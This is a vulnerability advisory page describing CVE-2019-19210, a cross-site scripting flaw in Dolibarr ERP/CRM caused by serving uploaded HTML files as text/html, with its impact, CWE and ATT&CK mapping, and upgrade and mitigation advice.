CVE-2019-19210 in ERP CRM
Summary
by MITRE
Dolibarr ERP/CRM before 10.0.3 allows XSS because uploaded HTML documents are served as text/html despite being renamed to .noexe files.
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Analysis
by VulDB Data Team • 05/10/2025
The vulnerability identified as CVE-2019-19210 affects Dolibarr ERP/CRM versions prior to 10.0.3 and represents a critical cross-site scripting flaw stemming from improper handling of uploaded HTML documents. This issue arises from the application's insecure file processing mechanism where HTML content is permitted to be uploaded and subsequently served with the text/html MIME type despite being renamed to .noexe extensions. The flaw demonstrates a classic case of inadequate input validation and output encoding, creating an environment where malicious actors can inject harmful scripts into web applications that users interact with regularly.
The technical implementation of this vulnerability involves the web application's file upload and serving mechanisms failing to properly sanitize or validate the content type of uploaded files. When users upload HTML documents, the system renames these files to .noexe format as a security measure intended to prevent execution of potentially malicious code. However, the application continues to serve these files with text/html content type headers, which allows browsers to interpret the HTML content as executable web pages rather than static documents. This misconfiguration creates a pathway for attackers to embed malicious JavaScript code within the uploaded documents, which then executes in the context of other users' browsers when they access these documents through the application interface.
The operational impact of this vulnerability extends beyond simple data theft or defacement, as it provides attackers with the capability to establish persistent footholds within the organization's web application environment. Successful exploitation enables attackers to perform session hijacking, steal sensitive user credentials, redirect users to malicious websites, or execute arbitrary code within the victim's browser context. The vulnerability affects the integrity of the entire Dolibarr application ecosystem since it allows attackers to compromise user sessions and potentially escalate privileges within the system. This type of vulnerability is particularly dangerous in enterprise environments where ERP/CRM systems contain sensitive business data and user authentication information.
Security professionals should recognize this vulnerability as a manifestation of CWE-79 - Cross-site Scripting, which represents one of the most prevalent and dangerous web application security flaws. The issue also aligns with ATT&CK technique T1059.007 - Command and Scripting Interpreter: JavaScript, as attackers can leverage the XSS vulnerability to execute JavaScript payloads in victim browsers. Additionally, the vulnerability demonstrates characteristics of improper file type handling and content disposition issues that fall under the broader category of improper input validation. Organizations should implement immediate mitigations including updating to Dolibarr version 10.0.3 or later, implementing strict file content validation, and ensuring that all uploaded files are served with appropriate MIME types that prevent execution of embedded scripts. The vulnerability underscores the importance of defense in depth strategies and proper security configuration management in enterprise applications.